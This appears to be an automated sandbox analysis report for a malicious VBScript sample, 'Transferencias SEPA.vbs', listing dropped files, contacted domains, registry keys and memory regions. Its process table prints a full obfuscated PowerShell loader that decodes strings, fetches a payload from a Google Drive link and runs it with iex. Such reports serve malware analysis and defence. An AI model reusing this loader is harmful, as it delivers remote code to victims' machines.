Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Transferencias SEPA.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt50uqrg.tml.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgkm3fob.gxz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Fldekager.Con
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function
Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath;
$Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function
anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm
kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv;
ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch
vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe
ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny
';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu
oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl
Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA
keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87
'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil
t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme
P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol
Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP
AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87
'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e
Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl
.akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry
(Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol
Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa
abeDrnudmLappa.Brug.NTallee KafftFersk.teddyW B,chestosnbAffreCtredalknastiDemoke To enCompetBrode ');anthropometry (Toxophilism87
'Be.ol$umaadGGge.de Uar,nTymbaaTha.ln EvejvDelpreCyllonSensodAss seLovbelSidetsNynaze Eksesy,unglSmackoSt.fsvA,tiaeRetian
Per.e.inocs Vult. svinH,undfeMele.atelemd StraeInterrDissis Bo.e[Diona$Sek.nNGrnsey,eflet PredtFortyeBde insignadBiplae ManasAppro]An
iu= .uic$Lexi.GAlfadi Equim.bjecmGeldeeSkr.erR.stalNoaa.aHi,simSpaltsStorh ');$Ampereomraadet=Toxophilism87 'balloGBut oeSideon
kibsaMo.ybnresi,vIn faeBrakinKl.kedT ukhe Elevl H,ngsring e m shs Acrolsu,faoBank vSquase BhutnSaniceOk ids Fler.TilgaDSo.anoPaterw
taktnebulll solsoB.rina verhd,efleF.ortliOrdgylDiploeAuto (Wo,se$PaataF ris,r PaleaL gderRegasaUnpepaRokk,d o,deeLodssdAsbe.e
Po,b,Vi.il$ Hje ERhabdx Gynetserote OverrMeninnSkrubastryklOmlahiNicotsOvervt V ne)freml ';$Ampereomraadet=$liquorish[1]+$Ampereomraadet;$Externalist=$liquorish[0];anthropometry
(Toxophilism87 'c.alo$Evelig.croalSwon.oSh,nkbGrensaptakilAccel:ScurfF De ulTop,gySkivgtRentet Udste ,ilid Afv eDmret5B,dtv3Semem=touch(Hyd
tTJerseeRetousCarkit,eled- nconPProfoa DiartPreaphIndiv Hane,$ .ydaES.rifxTitretPree,eMagrerFlbedn ManiaEntonl S,ori Bin,sLugsatIs.la)Svirv
');while (!$Flyttede53) {anthropometry (Toxophilism87 'Exter$A.etagUnwillF.skeoRutscbAn.ihaAthyml Aale:StackU ReconValmuiVarmeoeffecnDidnhe
ArberSpi tnSireneN,isk=Snarl$G atbtGenlorafgifuUru,ueTalsm ') ;anthropometry $Ampereomraadet;anthropometry (Toxophilism87
'UnconSIsospt.bsciaBank rDemartPara -TowelSAdvoklPaavie VapoeInd,fp Bran agna.4H rbi ');anthropometry (Toxophilism87 'Respo$PseudgO.ervl
Jul.oRad.lbHypoma B bulSy.te: FaglFGagerlThen,yBaggrtSailptBun,ee Fro.dTrefae Uful5 jene3 st i=Over,(Un.alTAllegeC,kels Hi
rtFagud-Lew,sPFlaucaPseudtAcrobh Drak Chim$Het rE Sti,xSndr tChondeComper AftenHmorra AlerlOpspoiWissfsHorolt O cu)Arbej
') ;anthropometry (Toxophilism87 'Laven$Udskng ,ecolS.bpeo.nforbAf,ada Ba elKvart: KorsROssmie sdumsTer,iiFjerngBort,nPlatte
PolarTor,l7preda7Seeds=Speci$Neostg VeralcigaroEpimybOptllaTvrfalHasta: mblaKin.ttFigurl Per a SkrmsKnudde .umbnCerem+,ryll+Nonju%Verni$PlastU
indwnAkkomd rgeeUnciar Au,ovma.thgFurunt.egroiCarpog Folkh UnuteH.emod Be,isStilm1Bille3afval4 Ambu.BoudocAgg eo Slufu,rndvn
CeretUnsal ') ;$Fraraadede=$Undervgtigheds134[$Resigner77];}anthropometry (Toxophilism87 ' Snoo$ Ce.egBannelAffalo,aldybRo.leaN.ngrlKortl:H.nstNQuizeoP.lshnStyr,cTabitoOverpn
Su asBecrat.oyalrO,dknuInhalcRoupetPectiiAromeoTofron Yuca Chak=Gen e MonogGTranse bio,tConge-PommeCHjer okashunUncoftSvve,eunangnAu,omtTmrer
.kraa$ProsoE PlebxVedhntdanefe.langrGamogn .fbraHid rlRes.piClouesMu.ift Form ');anthropometry (Toxophilism87 'Anlg $unencgommatlSalg
oSteelbUnbecaMe,allHelle:AllurDHumpbaskovanServenEthicePlenulDiurnsNotioe Myeln,ekst Pig t=Straf Det.[HuskeS TaagyAr,its
rtshtAberre BoffmMedli.GengaCNedsloKomtenKatapvOv.rseSy,osrlli,gtUnmat]Expro:,argi: topmFSagkyrDevouoI.conm NarrB TegnaPy.mysSorroeGaste6Tyl.s4BabyeS
Middtko.parFilitiStrimn.ispugHande(Affec$Rep.gNVir.loVet.rnKontocHypheoGribenSpisesG inst N.dkrLirkeu YankcHundetGeosiiForuno
Da tnDagsk)L raw ');anthropometry (Toxophilism87 'Vejar$Holocg MicelSma hoHelhebs,miaa,ahool Or.i:Umbe,SMetolaGrubenFejl.sUdspaeValorlHaabeiP,atygAtom
hT emoeu,ilad Koks Plagi=Gkke, anma,[ SamfST.uchyTvangsSkar,tGigasePredim.tten.NagysTf.ongeVristxNull.t omot. PengEForsonFixatcErklroLseladFuturiSamlenhypo,g
Broc]Mel n: Rhin:Hij cA KiosS Mar C Kva,IHypopIFlids.O rafG Ink.eL.bstt UnroShype.tUdeblrS edpiBortgn Of.egCent (K uli$TaageD
JongaFirepn C rinDefiaeTidsbl Igans,dspaeVapsenMedic)Varie ');anthropometry (Toxophilism87 ' sp.g$Goni.g HaralArkimoOverrbBiotoaRoyallOrdre:
V tiFMed,cyPausenHyttebC oreo.herme Kis.r Encan IdreeFldeb=patri$Bere,SFoulma sktnKatols Op.ae DemolSo,iviGrnseg .ilphAcroseFrlaadEfter.
Un,asGirokuhotmebTeknosKassetPyrenr Ep sist renOsteogParis(Syste3 Bor,0Spati4Thwar9O,ner8 Lang2Doler,pil t2 E.in9 adi3Koinc4
,nde8Klu.e) Kult ');anthropometry $Fynboerne;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
|
217.20.53.35
|
||
|
drive.google.com
|
173.194.219.101
|
||
|
drive.usercontent.google.com
|
173.194.219.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
173.194.219.101
|
drive.google.com
|
United States
|
||
|
173.194.219.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFE7EA50000
|
trusted library allocation
|
page read and write
|
||
|
2497601B000
|
heap
|
page read and write
|
||
|
24974039000
|
heap
|
page read and write
|
||
|
23CBC2EC000
|
heap
|
page read and write
|
||
|
23CBC21F000
|
heap
|
page read and write
|
||
|
D9934BB000
|
stack
|
page read and write
|
||
|
D992D7E000
|
stack
|
page read and write
|
||
|
23CBC664000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
23CBC42E000
|
heap
|
page read and write
|
||
|
23CBC723000
|
heap
|
page read and write
|
||
|
23CBC18A000
|
heap
|
page read and write
|
||
|
23CBC1B6000
|
heap
|
page read and write
|
||
|
23CBC433000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
23CBC389000
|
heap
|
page read and write
|
||
|
23CBC5AF000
|
heap
|
page read and write
|
||
|
23CBC376000
|
heap
|
page read and write
|
||
|
23CBA56E000
|
heap
|
page read and write
|
||
|
7FFE7E794000
|
trusted library allocation
|
page read and write
|
||
|
23CBC380000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
7FFE7EA00000
|
trusted library allocation
|
page read and write
|
||
|
23CBC44D000
|
heap
|
page read and write
|
||
|
249762B2000
|
heap
|
page read and write
|
||
|
24901E0C000
|
trusted library allocation
|
page read and write
|
||
|
23CBC3A1000
|
heap
|
page read and write
|
||
|
24975A70000
|
heap
|
page read and write
|
||
|
23CBA530000
|
remote allocation
|
page read and write
|
||
|
23CBC18D000
|
heap
|
page read and write
|
||
|
7FFE7EB10000
|
trusted library allocation
|
page read and write
|
||
|
23CBC38C000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBC5C2000
|
heap
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
23CBA530000
|
remote allocation
|
page read and write
|
||
|
212DA390000
|
heap
|
page read and write
|
||
|
23CBC1D8000
|
heap
|
page read and write
|
||
|
24901DD7000
|
trusted library allocation
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC1BE000
|
heap
|
page read and write
|
||
|
24901DF2000
|
trusted library allocation
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
7FFE7E94A000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBC394000
|
heap
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC3C5000
|
heap
|
page read and write
|
||
|
7D0ABFE000
|
stack
|
page read and write
|
||
|
23CBC2DA000
|
heap
|
page read and write
|
||
|
23CBC1DA000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
23CBC5A3000
|
heap
|
page read and write
|
||
|
7FFE7EAD0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
249008B6000
|
trusted library allocation
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC403000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC3A4000
|
heap
|
page read and write
|
||
|
23CBC180000
|
heap
|
page read and write
|
||
|
24901E4E000
|
trusted library allocation
|
page read and write
|
||
|
23CBC32E000
|
heap
|
page read and write
|
||
|
24976270000
|
heap
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
B8AF4FD000
|
stack
|
page read and write
|
||
|
7D0ADFF000
|
stack
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC416000
|
heap
|
page read and write
|
||
|
23CBC18C000
|
heap
|
page read and write
|
||
|
7FFE7E990000
|
trusted library allocation
|
page read and write
|
||
|
23CBC232000
|
heap
|
page read and write
|
||
|
7FFE7E84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7EA90000
|
trusted library allocation
|
page read and write
|
||
|
23CBC1D2000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC423000
|
heap
|
page read and write
|
||
|
249004B3000
|
trusted library allocation
|
page read and write
|
||
|
23CBC3F3000
|
heap
|
page read and write
|
||
|
7FFE7E8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D0B4FF000
|
stack
|
page read and write
|
||
|
249102EA000
|
trusted library allocation
|
page read and write
|
||
|
23CBC1EE000
|
heap
|
page read and write
|
||
|
23CBC44D000
|
heap
|
page read and write
|
||
|
23CBC687000
|
heap
|
page read and write
|
||
|
23CBC5B8000
|
heap
|
page read and write
|
||
|
D993E8E000
|
stack
|
page read and write
|
||
|
24975B50000
|
heap
|
page execute and read and write
|
||
|
24901DB8000
|
trusted library allocation
|
page read and write
|
||
|
23CBC352000
|
heap
|
page read and write
|
||
|
7D0B2FE000
|
stack
|
page read and write
|
||
|
23CBC3C0000
|
heap
|
page read and write
|
||
|
23CBC3FB000
|
heap
|
page read and write
|
||
|
249743A0000
|
heap
|
page readonly
|
||
|
249764B0000
|
heap
|
page read and write
|
||
|
D993137000
|
stack
|
page read and write
|
||
|
2490087D000
|
trusted library allocation
|
page read and write
|
||
|
24975AC6000
|
heap
|
page execute and read and write
|
||
|
24975BAB000
|
heap
|
page read and write
|
||
|
23CBC3CD000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
D992DFF000
|
stack
|
page read and write
|
||
|
23CBC1F6000
|
heap
|
page read and write
|
||
|
23CBC780000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBA2F5000
|
heap
|
page read and write
|
||
|
2491000F000
|
trusted library allocation
|
page read and write
|
||
|
23CBA375000
|
heap
|
page read and write
|
||
|
23CBC1C2000
|
heap
|
page read and write
|
||
|
23CBC637000
|
heap
|
page read and write
|
||
|
23CBC71C000
|
heap
|
page read and write
|
||
|
23CBC33C000
|
heap
|
page read and write
|
||
|
24900471000
|
trusted library allocation
|
page read and write
|
||
|
24976278000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
23CBC32C000
|
heap
|
page read and write
|
||
|
24901DB3000
|
trusted library allocation
|
page read and write
|
||
|
23CBC1A9000
|
heap
|
page read and write
|
||
|
23CBC1F7000
|
heap
|
page read and write
|
||
|
23CBA56D000
|
heap
|
page read and write
|
||
|
D99333E000
|
stack
|
page read and write
|
||
|
23CBC581000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC781000
|
heap
|
page read and write
|
||
|
23CBC376000
|
heap
|
page read and write
|
||
|
23CBA290000
|
heap
|
page read and write
|
||
|
23CBC43E000
|
heap
|
page read and write
|
||
|
D9929C3000
|
stack
|
page read and write
|
||
|
24900001000
|
trusted library allocation
|
page read and write
|
||
|
23CBC1F3000
|
heap
|
page read and write
|
||
|
249012E6000
|
trusted library allocation
|
page read and write
|
||
|
23CBC728000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
24910011000
|
trusted library allocation
|
page read and write
|
||
|
23CBC34B000
|
heap
|
page read and write
|
||
|
7FFE7EA60000
|
trusted library allocation
|
page read and write
|
||
|
23CBA270000
|
heap
|
page read and write
|
||
|
23CBC32E000
|
heap
|
page read and write
|
||
|
249101B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E793000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
23CBC3B8000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
23CBC1A6000
|
heap
|
page read and write
|
||
|
23CBC3AD000
|
heap
|
page read and write
|
||
|
23CBC426000
|
heap
|
page read and write
|
||
|
24975BB0000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
24973FF0000
|
heap
|
page read and write
|
||
|
23CBC52A000
|
heap
|
page read and write
|
||
|
24974370000
|
trusted library allocation
|
page read and write
|
||
|
2497604B000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
23CBC1CA000
|
heap
|
page read and write
|
||
|
24974057000
|
heap
|
page read and write
|
||
|
23CBC60D000
|
heap
|
page read and write
|
||
|
D992F7E000
|
stack
|
page read and write
|
||
|
23CBC52A000
|
heap
|
page read and write
|
||
|
23CBC220000
|
heap
|
page read and write
|
||
|
2497634A000
|
heap
|
page read and write
|
||
|
23CBC3FE000
|
heap
|
page read and write
|
||
|
D992C7D000
|
stack
|
page read and write
|
||
|
249760EC000
|
heap
|
page read and write
|
||
|
249762DA000
|
heap
|
page read and write
|
||
|
23CBC1E2000
|
heap
|
page read and write
|
||
|
7FFE7E7B0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC32B000
|
heap
|
page read and write
|
||
|
23CBC3EA000
|
heap
|
page read and write
|
||
|
7D0AAFE000
|
stack
|
page read and write
|
||
|
24900084000
|
trusted library allocation
|
page read and write
|
||
|
D99343E000
|
stack
|
page read and write
|
||
|
24910001000
|
trusted library allocation
|
page read and write
|
||
|
24974080000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
23CBC336000
|
heap
|
page read and write
|
||
|
23CBC3D5000
|
heap
|
page read and write
|
||
|
23CBC280000
|
heap
|
page read and write
|
||
|
2497403B000
|
heap
|
page read and write
|
||
|
23CBC229000
|
heap
|
page read and write
|
||
|
2490048D000
|
trusted library allocation
|
page read and write
|
||
|
23CBA2F5000
|
heap
|
page read and write
|
||
|
23CBC445000
|
heap
|
page read and write
|
||
|
23CBC1CB000
|
heap
|
page read and write
|
||
|
23CBC1BE000
|
heap
|
page read and write
|
||
|
24976091000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
23CBC728000
|
heap
|
page read and write
|
||
|
23CBC2F2000
|
heap
|
page read and write
|
||
|
23CBC381000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
7FFE7E9A0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC371000
|
heap
|
page read and write
|
||
|
24973F70000
|
heap
|
page read and write
|
||
|
B8AF5FF000
|
unkown
|
page read and write
|
||
|
23CBA39B000
|
heap
|
page read and write
|
||
|
23CBC44D000
|
heap
|
page read and write
|
||
|
249018B9000
|
trusted library allocation
|
page read and write
|
||
|
24974390000
|
trusted library allocation
|
page read and write
|
||
|
D993F0D000
|
stack
|
page read and write
|
||
|
D992EFE000
|
stack
|
page read and write
|
||
|
23CBC181000
|
heap
|
page read and write
|
||
|
7FFE7E9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7E941000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7EB00000
|
trusted library allocation
|
page read and write
|
||
|
23CBC638000
|
heap
|
page read and write
|
||
|
23CBC52A000
|
heap
|
page read and write
|
||
|
23CBC728000
|
heap
|
page read and write
|
||
|
23CBC3D8000
|
heap
|
page read and write
|
||
|
2497400A000
|
heap
|
page read and write
|
||
|
24901E49000
|
trusted library allocation
|
page read and write
|
||
|
24976000000
|
heap
|
page read and write
|
||
|
23CBC391000
|
heap
|
page read and write
|
||
|
23CBA2FF000
|
heap
|
page read and write
|
||
|
D992E7C000
|
stack
|
page read and write
|
||
|
24975BA0000
|
heap
|
page read and write
|
||
|
23CBC5AD000
|
heap
|
page read and write
|
||
|
23CBC293000
|
heap
|
page read and write
|
||
|
23CBC3DF000
|
heap
|
page read and write
|
||
|
23CBC32E000
|
heap
|
page read and write
|
||
|
D992FFE000
|
stack
|
page read and write
|
||
|
7FFE7E9F0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC406000
|
heap
|
page read and write
|
||
|
23CBC2DA000
|
heap
|
page read and write
|
||
|
23CBC5E9000
|
heap
|
page read and write
|
||
|
D9931B8000
|
stack
|
page read and write
|
||
|
7D0B0FC000
|
stack
|
page read and write
|
||
|
7FFE7E9C0000
|
trusted library allocation
|
page read and write
|
||
|
24975A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7EAF0000
|
trusted library allocation
|
page read and write
|
||
|
23CBC39C000
|
heap
|
page read and write
|
||
|
24976570000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
23CBC2EE000
|
heap
|
page read and write
|
||
|
23CBC2EE000
|
heap
|
page read and write
|
||
|
23CBC357000
|
heap
|
page read and write
|
||
|
23CBC187000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
7FFE7E960000
|
trusted library allocation
|
page execute and read and write
|
||
|
23CBC5C4000
|
heap
|
page read and write
|
||
|
23CBC3E7000
|
heap
|
page read and write
|
||
|
23CBC341000
|
heap
|
page read and write
|
||
|
23CBC228000
|
heap
|
page read and write
|
||
|
24975B30000
|
heap
|
page execute and read and write
|
||
|
23CBC5CF000
|
heap
|
page read and write
|
||
|
23CBC384000
|
heap
|
page read and write
|
||
|
23CBC30E000
|
heap
|
page read and write
|
||
|
2490049E000
|
trusted library allocation
|
page read and write
|
||
|
23CBC183000
|
heap
|
page read and write
|
||
|
23CBC2DA000
|
heap
|
page read and write
|
||
|
249743B5000
|
heap
|
page read and write
|
||
|
7D0A75A000
|
stack
|
page read and write
|
||
|
23CBC1D7000
|
heap
|
page read and write
|
||
|
7FFE7E972000
|
trusted library allocation
|
page read and write
|
||
|
23CBC28F000
|
heap
|
page read and write
|
||
|
23CBA37C000
|
heap
|
page read and write
|
||
|
23CBC1AE000
|
heap
|
page read and write
|
||
|
23CBC3D0000
|
heap
|
page read and write
|
||
|
23CBC3C8000
|
heap
|
page read and write
|
||
|
D992CFE000
|
stack
|
page read and write
|
||
|
7FFE7E792000
|
trusted library allocation
|
page read and write
|
||
|
23CBC1FE000
|
heap
|
page read and write
|
||
|
23CBA530000
|
remote allocation
|
page read and write
|
||
|
23CBA568000
|
heap
|
page read and write
|
||
|
7FFE7E7AB000
|
trusted library allocation
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC32A000
|
heap
|
page read and write
|
||
|
23CBC364000
|
heap
|
page read and write
|
||
|
24976190000
|
heap
|
page read and write
|
||
|
23CBC210000
|
heap
|
page read and write
|
||
|
23CBC437000
|
heap
|
page read and write
|
||
|
D9933BE000
|
stack
|
page read and write
|
||
|
23CBC3F6000
|
heap
|
page read and write
|
||
|
24901DCC000
|
trusted library allocation
|
page read and write
|
||
|
24974037000
|
heap
|
page read and write
|
||
|
23CBC6B3000
|
heap
|
page read and write
|
||
|
23CBC44D000
|
heap
|
page read and write
|
||
|
23CBC1A6000
|
heap
|
page read and write
|
||
|
23CBC295000
|
heap
|
page read and write
|
||
|
7FFE7EAC0000
|
trusted library allocation
|
page read and write
|
||
|
24900489000
|
trusted library allocation
|
page read and write
|
||
|
23CBC34B000
|
heap
|
page read and write
|
||
|
23CBC372000
|
heap
|
page read and write
|
||
|
23CBC399000
|
heap
|
page read and write
|
||
|
23CBC224000
|
heap
|
page read and write
|
||
|
